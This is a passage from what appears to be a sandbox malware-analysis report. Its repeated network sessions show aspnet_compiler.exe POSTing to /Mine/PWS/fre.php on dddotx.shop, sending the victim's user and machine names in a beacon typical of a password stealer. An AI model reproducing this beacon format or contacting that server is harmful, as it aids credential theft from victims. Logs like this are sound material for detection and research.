              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKk9X7He4imPTn9N4bCbuqMOLMsRD5dFtRnEVnu8JTnHW2qPLruowa9him52BA0i%2FW87eZ2xDovDt5k9XjEcysGh%2BGZxQvaLAPotvRqflcXZnwNHL%2B3cx0l5xuqflQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89983d68468c4b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              82192.168.2.749787188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:23.681214094 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:23.686182022 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:24.397758007 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:24 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5bJIy3o9EhTXFjlzaRbPcoTpBajJhh0r9SDFtIv4v%2F%2B%2BWMTjRKwDvjw2pngIouEiHhydWzhdAaZRFZh61TTaNeHArJrVU6YenuZVdseHzr1RhshSk4kZj%2Boe8vpXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998428da68c8f-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              83192.168.2.749788188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:24.540045977 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:24.545069933 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:25.365967035 CEST575INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:25 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBbOvRKKYajNu%2FN9N7BR6q%2F6f9jK4wDk8%2FiSAmUoewl%2FATF%2F1SYe2Egm69UCFaAB298E5dxMeFzofVeB%2FZjiddvHoGwfFKMzjxqaJYey%2BHL8B5odJGQpLOknJpIrDg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899847da75c41d-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              84192.168.2.749789188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:25.511182070 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:25.516197920 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:26.201577902 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:26 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M06G91N2FVGMNROUj21ArajTcdWS1xC%2BV%2BvOYeJGfUp6%2BnMv%2FaWy8MdTzuzj83k97MXL4V9VjfLTeJ55dFOpenvETXhbctNzIroAa22vj4loWR6QCVWqpN1oNobqaA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89984e0efb727b-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              85192.168.2.749790188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:26.362179995 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:26.367186069 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:27.025301933 CEST587INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:26 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3GC%2BTQ%2BuR8ct712CfZymo%2FJa%2Bm4%2FNSLfkjirkP%2B%2B768IDnF%2FCac9iPL1koSGwoyGX%2F3dt3wiPr1lS908Xjep8%2B0sqtU6ZR%2F6LZugilaBo7uMf%2F%2FT9dbSlNE9gmTmg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998534df68cc6-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              86192.168.2.749791188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:27.182550907 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:27.187594891 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:27.837362051 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:27 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMj4GF8CWWp5Z04O3h6mZjPvasKM0tD0AMO9rC%2FVrGzOjYUyF61nJ%2B2TO5v1y%2BCHbY%2FoRy6MGMiZHlTZG0eWcFcHnE1TRGhHzUndrTovL3jfiFUy1cEQZIRu%2BWKOkA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998586aa64378-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              87192.168.2.749792188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:27.999268055 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:28.005116940 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:28.650580883 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:28 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=moiXY1vlYQHlk5ZuybvaRpxNQ6%2BdlTjTOonMBAj71MxXrujiFabEmx%2FD8Rvh9XHWgmx8T9MfDzsFP1l22oEsKDoaPh0giLRjffVPPkAtLggujYXKm2MUmQUlRupYiA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89985d7d6472bc-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              88192.168.2.749793188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:28.818383932 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:28.823348045 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:29.642699957 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:29 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwSKl9u36nZAANMXUlEtA5DFHzvTAZOuDIKu7oRrQ9KvcCH3MTTIROYrwQuzzSsi9BUssSCSawJZWrH%2FeOQ0n9x8hahldEP4U78p%2FOkATLkc2Y3aIWgM3U8BBIHjAw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899862abd97d00-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              89192.168.2.749794188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:29.788256884 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:29.793056965 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:30.571324110 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:30 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FMi%2FZWChQp2LqquGMkMv42SVRnjmNqxStpkbJ3fDdos43BxY0YcpwoSYBrD4sujV1nfhK3UM5cinr3wZh6xLBZ2M%2FfowOTYpvf%2F5nnsNYcuOwTt2iIOoC1AAVK1Pbg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899868b986c325-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              90192.168.2.749795188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:30.718878984 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:30.724247932 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:31.376924038 CEST603INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:31 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yFrQkPkLamDld5W5wriiNQgmC%2BSo9loJFEC8KW6YHzDjC5z4nMUMHvjq%2Fc8Pmbb0CCljcTlfZaOzVln74RXvSMnvvuY2a%2BrSY%2FT7%2B03IrFFasZZLiVaMl3%2BIrIgYbw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89986e7fd24337-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              91192.168.2.749796188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:31.524990082 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:31.529839993 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:32.191046000 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:32 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5OVG5YiCMrV84bJ7Zw1%2Flvx%2FtxNuYU7A4O4mu5oqLSc5mCpfTw1272OBzxzh4TkOtTwyTrS3KVUNA1qMwrtjDs9G3a2oj5h1WgahD5v0mNEXV2SV8AiPG54MF0T8qA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998738e6d8ca2-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              92192.168.2.749797188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:32.344170094 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:32.349270105 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:33.000392914 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:32 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OmR17Gc5eQ3h8YKUqWePUNU5PpUhhbkOvO7guUo4MUnpFNjla6bH3ur0SryQStd%2FJ7myiw0gfIIFhbFOX2trQ2mxchGnqyRZMWZlFwvGNa2qIERCBeuX%2BPiCx46uaA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899878aa494315-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              93192.168.2.749798188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:33.153882027 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:33.159073114 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:33.843158007 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:33 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbyJTwhEpqqdBGaRDsIWx3ZrpPgk3eS5XfLRlvdYek8gx0AEFAbnqYLoViXzOKJPICN%2BxyB9OC%2BTc5WHZb1fNXLQ46ECeWTOs%2FHgw3wGkwaTHw65nPobkhzkXnlAtA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89987dbf7743dc-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.749799188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:33.999581099 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:34.004750967 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:34.678819895 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:34 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dlMZDf%2Bn4D65VkD1pzFMRELFZ87KEWLz5ix6NhcZ522XTP%2Bflofa%2FAZz6TdaC568npLz%2Bp8BMqZvJeSpZxB6xtPNF4pseQUuj7DpQ6ETlB%2BNytHtURq1RgsPkwARcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899882fce30fa4-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.749800188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:34.826895952 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:34.831696033 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:35.509651899 CEST573INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:35 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WNY2y%2B2%2Bf%2F8rx3m%2BVYe1dw0%2FQpXGXSI5piq2XkZwyrwbDz71Tn9BoRcH22JBq1uFaDOLzTPtB0W%2Fe8VYJafFLfZz5Gr1pOPSzJbXbRxqqvWktydERy4VeKOeMiJxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8998882bff42c8-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.749801188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:20:35.671930075 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:20:35.676731110 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:20:36.333214045 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:20:36 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
